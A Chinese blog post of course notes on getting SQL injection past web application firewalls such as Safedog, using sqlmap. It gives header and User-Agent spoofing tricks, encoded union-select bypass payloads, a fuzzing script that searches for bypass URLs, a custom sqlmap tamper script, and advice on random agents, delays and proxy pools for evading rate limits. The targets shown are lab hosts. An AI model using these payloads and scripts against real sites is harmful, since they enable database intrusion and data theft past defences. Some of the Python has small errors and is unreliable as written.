2020小迪培训(第19天WEB 漏洞-SQLMAP 绕过 WAF)

最新推荐文章于 2023-05-18 23:09:28 发布
最新推荐文章于 2023-05-18 23:09:28 发布
阅读量649 收藏 4
点赞数 2
分类专栏: 2020小迪培训 文章标签: php 数据库 爬虫
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45889197/article/details/119974960
版权

WEB 漏洞-SQLMAP 绕过 WAF

前言

在攻防实战中,往往需要掌握一些特性,比如服务器、数据库、应用层、WAF 层等,以便我们更灵活地去构造 Payload,从而可以和各种WAF 进行对抗,甚至绕过安全防御措施进行漏洞利用。

image-20210820123442525

演示案例

  • 简要其他绕过方式学习

    • 白名单

      • 方式一:IP 白名单
        从网络层获取的 ip,这种一般伪造不来,如果是获取客户端的 IP,这样就可能存在伪造 IP 绕过的情况。
        测试方法:修改 http 的 header 来 bypass waf
        X-forwarded-for
        X-remote-IP
        X-originating-IP
        x-remote-addr
        X-Real-ip

      • 如果waf接受IP地址是通过网络层(TCP、IP)即使我们对数据包进行修改,对方也是不会接受的/不以它为主

        实战中意义不大,需要满足的条件比较多(接受数据方式是用不用脚本解析)

      • 方式二:静态资源
        特定的静态资源后缀请求,常见的静态文件(.js .jpg .swf .css 等等),类似白名单机制,waf 为了检测效率,不去检测这样一些静态文件名后缀的请求。
        http://10.9.9.201/sql.php?id=1
        http://10.9.9.201/sql.php/1.js?id=1
        备注:Aspx/php 只识别到前面的.aspx/.php 后面基本不识别

      • 我们可以发现在我们加了x.txt后还可以正常访问页面,在之前我们可以这种方式进行waf绕过,但现在不行了

        发现加上 and 1=1后直接被拦截

        image-20210828095412245

      • 方式三:url 白名单(现在绕不过)
        为了防止误拦,部分 waf 内置默认的白名单列表,如 admin/manager/system 等管理后台。只要 url中存在白名单的字符串,就作为白名单不进行检测。常见的 url 构造姿势:

        https://10.9.9.201/sql.php/admin?id=1
        https://10.9.9.201/sql.php?a=/manage/&b=…/etc/passwd
        https://10.9.9.201/…/…/…/manage/…/sql.asp?id=2
        waf通过/manage/进行比较,只要在uri中存在/manage/就作为白名单不进行检测,这样我们可以通过/sql.php?a=/manage/&b=…/etc/passwd绕过防御规则

      • 方式四:爬虫白名单(有用)
        部分waf有提供爬虫表名单的功能,识别爬虫的技术一般有两种:
        1、根据UserAgent 2、通过行为判断
        UserAgent可以很容易欺骗,我们可以伪装成爬虫尝试爬过
        User Agent Switch(Firefox附加组件)
        https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/

      • 扫描器过快的进行扫描,不仅获得的信息是假的,还会被waf拦截。

        image-20210828104206129

      • 这时候我们用脚本进行扫描,在http头部修改UserAgent进行欺骗,让对方服务器误以为是搜索引擎进行爬虫,从而成功不被拦截,获取到相关信息。 image-20210828112718157

  • FUZZ 绕过脚本结合编写测试(代码在资源那)
    image-20210828112745641

  • 阿里云盾防 SQL 注入简要分析

  • 安全狗+云盾 SQL 注入插件脚本编写

    • 在安全狗开启的情况下,我们使用sqlmap工具进行注入,发现注入失败

      image-20210828210651767

    • -tamper的使用(内置的脚本只能针对与那些ctf比赛,我们一般都是需要自己编写脚本)

    • 我们自己编写代码(资源二)进行注入,发现还是注入不了。在这里我们分析注入不了的原因,一方面不是扫描过快(网站还可以打开),一方面也不是因为脚本的原因
      image-20210828212554354
      image-20210828212615889

    • 我们进行抓包,看看原因出现在哪里?
      image-20210828213125658
      image-20210828213056442

    • 通过抓包所得的数据和安全狗的防护规则,我们发现原因在于sqlmq在http头部自爆身份了,导致注入不成功

      image-20210828213608531

    • 为了解决这个问题,我们使用 --radom-agent来进行user-agent头部随机性,防止自报家门。(没开cc攻击防护)

      image-20210828215410150

    • 使用同样的语句使用工具进行注入,发现注入一半停下来了,发现是访问太快被拦截了(开cc攻击防护),为了解决这个问题,我们可以使用延迟、代理池、爬虫这三种方法

      • 爬虫

        image-20210828223314786

      • 延迟

        image-20210828223746197

      • 代理池

        思想:主要是拦截一个IP地址,我们就换一个IP地址进行注入(调动很多台服务器)

  • 小知识

    • 如果遇到sqlmap中没有的功能怎么注入?(没有对应的语句能够对应我们需要改变的地方)

      • 写中转脚本(py开发)

        在第17天中提到过

      • 写在txt文件中

        image-20210828230953708

        image-20210828231031197

%23x%0aunion%23x%0Aselect%201,2,3

//版本号进行绕过,只有当满足条件(4.45.09版本以上)的时候该语句才会被执行,现在绕不过了
%20union%20/*!44509select*/%201,2,3%20/*!44509union*/%23x%0aselect%201,2,3

id=1/**&id=-1%20union%20select%201,2,3%23*/

%20union%20all%23%0a%20select%201,2,3%23

涉及资源

SQLmap详解 https://www.pianshen.com/article/90961667965/

资源一

import request,time

url='http://127.0.0.1/sqlilabs/less-2/?id=-1'
union = 'union'
select = 'select'
num = '1,2,3'
a = {'%0a','%23'}
aa= {'x'}
aaa = {'%0a','%23'}
b = '/*!'
c = '*/'
def bypass():
	for du in a:
		for dus in aa:
			for duss in aaa:
				for two in range(44500,44600):  #版本号
					urls=url+du+dus+duss+b+str(two)+union+c+du+dus+duss+select+du+dus+duss+num

					#urls = url + du +dus +duss+union +du +dus +duss +b +str(two)+select+c +du+dus+duss+num
					try:
						result = request.get(urls).text
						len_r = len(result)
						if (result.find('safedog')==-1):
							print('bypass url addres :' + urls + '|' +str(len_r))
							if len_r == 715:
								fp = open('url.txt','a+')
								fp.write(urls+'\n')
								fp.close()
					except Exception as err:
						print('connecting error')
						time.sleep(0,1)
if _name_ == '_main_':
	print('fuzz start!')
	bypass()

资源二

#!/usr/bin/env python

"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import os

from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.HIGHEST

def dependencies():
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" %
(os.path.basename(__file__).split(".")[0], DBMS.MYSQL))

def tamper(payload, **kwargs):
#%23a%0aunion/*!44575select*/1,2,3
if payload:
payload = payload.replace("union", "%23a%0aunion")
payload = payload.replace("select", "/*!44575select*/")
payload = payload.replace("%20", "%23a%0a")
payload = payload.replace(" ", "%23a%0a")
payload = payload.replace("database()", "database%23a%0a()")
return payload

资源三


import json
import requests

url='http://192.168.0.103:8080/'

head={

'User-Agent':'Mozilla/5.0 

(compatible;Baiduspider-render/2.0;

+http://www.baidu.com/search/spider.html)'

}

for data in open('PH1P.txt'):

data=data.replace('\n','')

urls=url+data

code=requests.get(urls).status_code

print(urls+'|'+str(code))

 

最后感谢小迪师傅的视频!!

笔记来源视频:点击这里

是阿明呐
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Bypass-WAF-SQLMAP-master.zip
04-05
利用SQLMAP 绕过 WAF
教程第八天——注入工具sqlmap的使用
仲夏
10-17 665
1、安装过程1)安装python2.72)在python2.7的目录中解压sqlmap 3)在桌面建立快捷方式 2、使用方法1)get类型注入Sqlmap.py -u 注入地址 检测指定站点注入情况,默认会以get类型注入检测 2)post类型注入3)cookie类型注入Sqlmap.py -u 注入地址 –cookie “参数” –level 2 以cookie注入提交检测网站
第18、19天:WEB漏洞-WAF绕过注入以及SQLMAP绕过WAF
cailme的博客
05-18 1434
渗透测试day18、19天
第19天-WEB漏洞-SQL注入之SQLMAP绕过WAF
MCTSOG的博客
03-03 1827
在攻防实战中,往往需要掌握一些特性,比如服务器、数据库、应用层、WAF 层等,以便我们更灵活地去构造 Payload,从而可以和各种WAF 进行对抗,甚至绕过安全防御措施进行漏洞利用。 数据库特性(补充) %23x%0aunion%23x%0Aselect%201,2,3 %20/!44509union/%23x%0aselect%201,2,3 id=1/**&id=-1%20union%20select%201,2,3%23*/ %20union%20all%23%0a%20select%20
第19篇:WEB漏洞~SQL注入~SqlMap绕过WAF
廖一语山的博客
08-06 1730
Sqlmap
渗透测试必备神器SQLMAP的所有绕waf脚本合集
最新发布
10-18
SQLMAP利用这一点,通过构造特定的SQL语句,绕过防火墙的检测,直达数据库。 具体来说,SQLMAP首先会尝试猜测应用程序所使用的数据库类型(如MySQL、Oracle等),然后根据该数据库类型的语法和特性,构造出特定的...
实战绕过双重waf(玄武盾+程序自身过滤)结合编写sqlmap的tamper获取数据.pdf
03-24
实战绕过双重waf 玄武盾+程序自身过滤 结合编写sqlmap的tamper获取数据 文档来自互联网仅做学习使用,请勿使用文档相关内容进行违法犯罪活动。
sql注入-注入漏洞获得数据库数据-kali-sqlmap-运维安全详细笔记
06-30
sql注入-注入漏洞获得数据库数据-kali-sqlmap-运维安全详细笔记
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
2020小培训(第10天 信息收集-资产监控拓展)
是阿明呐的博客
08-01 2474
信息收集-资产监控拓展 Github 监控 便于收集整理最新 exp 或 poc 便于发现相关测试目标的资产 如何使用(为什么用这个技术?一是官方的ctms是需要收费的,我们可以通过监控github来找到类似的源码,二是在github官网上有着最新的检测漏洞报告) 首先将下面的内部接口放在 PyCharm中,安装所对应的脚本所需的库,即import后面的东西 接着在github注册、在https://sct.ftqq.com/ 微信登录后获取SendKey,在脚本中进行更改
2020小培训(第04天 基础入门-web源码拓展)
是阿明呐的博客
07-25 1307
基础入门-web源码拓展 ​ 前言:web源码在安全测试中是非常重要的信息来源,可以用来代码审计漏洞也可以用来做信息突破口,其中web源码有很多技术需要简要分析。比如获取asp源码后可以采用默认数据库下载为突破,获取其他脚本源码漏洞可以进行代码审计挖掘或分析其业务逻辑等,总之源码的获取将为后期的安全测试提供了更多的思路。 知识点 关于web源码目录结构 关于web源码脚本类型 关于web源码应用分类 关于web源码其他说明 #数据库配置文件,后台目录,模板目录,数据库目录 #asp,php,aspx,
2020小培训 pikachu漏洞简易演示(第11天)
是阿明呐的博客
08-05 1305
pikachu漏洞简易演示SQL注入目录遍历漏洞1目录遍历漏洞2目录遍历和文件读取漏洞的区别文件上传漏洞文件下载漏洞 SQL注入 在这里我们加入输出SQL语句的代码 这里我们可以直接看到查询对应的查询语句 在浏览器中我们通过f12键判断出语句提交是post方式,在这里我们需要打开bq进行post传值的改变 这里是最开始的情况下,对应的网页和bq中的post界面 在这个过程中,我们可以通过bq中的repeater进行重发,根据返回的数据报对网页进行对应的判断,当然也可以通过前面的先
2020小培训(第17天 WEB 漏洞-二次,加解密,DNS,堆叠注入)
是阿明呐的博客
08-24 1302
WEB 漏洞-二次,加解密,DNS, 堆叠等注入 前言 加解密,二次,DNSlog 注入,堆叠查询注入 注入原理,演示案例,实际应用(中转注入) 演示案例 sqlilabs-less21-cookie&加解密注入(实际案例) 为什么要加密进行注入? ​ 答:代码中对cookee进行base64_decode解码,解码之后带入数据库中。所以我们在注入语句要按照它的加密方式进行加密,然后再提交。 进行抓包,我们可以看到数据包中uname的值是被加密的 把%3D改成=号,Decode as
2020小培训(第18天WEB 漏洞-WAF 绕过注入)
是阿明呐的博客
08-27 1016
WEB 漏洞-WAF 绕过注入 前言 知识点 市面上常见的 waf 产品列表分析-wafw00f ​ 阿里云盾,安全狗,宝塔 部分 bypass sqlinject payload 原理: ?id= 1 union %23a%0A select 1,2,3 其实是 union #a //写#闭合a,%0A换行让union select执行 select 1,2,3 安全狗匹配到union接着注释,安全狗认为句子结束 为防止安全狗继续读取下去,加上a来干
2020小培训(第07天 信息收集-cdn绕过技术)
是阿明呐的博客
07-26 874
信息收集-CDN绕过 ​ CDN的全称是ContentDeliveryNetwork,即内容分发网络。CDN是构建在现有网络基础之上的智能虚拟网络,依靠部署在各地的边缘服务器,通过中心平台的负载均衡、内容分发、调度等功能模块,使用户就近获取所需内容,降低网络拥塞,提高用户访问响应速度和命中率。但在安全测试过程中,若目标存在CDN服务,将会影响到后续的安全测试过程。 如何判断目标存在CDN服务 利用多节点技术进行请求返回判断 使用超级ping进行检查 CDN对于安全测试有什么影响 ​ 在不同的地方访
2020小培训(第14天 WEB 漏洞-类型及提交注入)
是阿明呐的博客
08-11 731
WEB 漏洞-类型及提交注入 前言 ​ 在真实 SQL 注入安全测试中,我们一定要先明确提交数据及提交方法后再进行注入,其中提交数据类型和提交方法可以通过抓包分析获取, 后续安全测试中我们也必须满足同等的操作才能进行注入。 简要明确参数类型 数字、字符、搜索、JSON (在实际操作中,我们需要用工具/人工进行多次尝试) 数字:前面教程所演示的SQL注入参数类型都是数字型的,我们在注入的时候不需要进行符号闭合的操作 字符:带有单引号,我们不能再采取数字型的注入方式,不然咱们进行测试的语句也被带进语
2020小培训(第21天 WEB 漏洞-文件上传之后端黑白名单绕过
是阿明呐的博客
09-07 722
WEB 漏洞-文件上传之后端黑白名单绕过 前言 文件上传常见验证 后缀名,类型,文件头等 后缀名:黑名单,白名单 黑名单:明确不允许上传的格式后缀 asp php jsp cgi war… 缺陷:在定义不完整的时候,可以使用其他格式达到绕过效果 白名单:明确可以上传的格式后缀 jpg png zip rar gif 相对于黑名单,验证会更安全一些 文件类型:MIME 信息(检测类型,不严谨,可以进行伪造) Content-Type为MIME信息,通过这个信息来猜测你的文件是什么格式的,什么后缀(验证方式之
2020小培训(第12天 WEB 漏洞--SQL 注入之简要SQL注入)
是阿明呐的博客
08-07 695
WEB 漏洞-SQL 注入之简要SQL注入 ​ 在本系列课程学习中,SQL 注入漏洞将是重点部分,其中 SQL 注入又非常复杂,区分各种数据库类型,提交方法,数据类型等注入,我们需要按部就班的学习,才能学会相关 SQL 注入的核心。同样此类漏洞WEB 安全中严重的安全漏洞,学习如何利用,挖掘,修复也是很重要的。(右边是重点) SQL注入安全测试中危害 危害数据库里的数据 直接危害到网站的权限(需要满足条件) SQL注入产生原理详细分析 原理:通过参数传递将恶意SQL语句传到SQL语句,实现自定义的
sqlmap绕过waf
08-09
回答: 为了绕过Web应用程序防火墙(WAF),可以使用sqlmap工具的一些技巧和参数。其中一种方法是使用`--tamper`参数,通过指定一个或多个tamper脚本来修改SQL语句,以绕过WAF的检测。例如,可以使用`space2morehash.py` tamper脚本来将空格字符转换为其他字符,使WAF无法检测到SQL注入。123 #### 引用[.reference_title] - *1* *2* [sqlmap 绕过WAF](https://blog.csdn.net/weixin_43304436/article/details/130776891)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}} ] [.reference_item] - *3* [sqlmap之绕过云锁waf](https://blog.csdn.net/qq_50854662/article/details/128565820)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值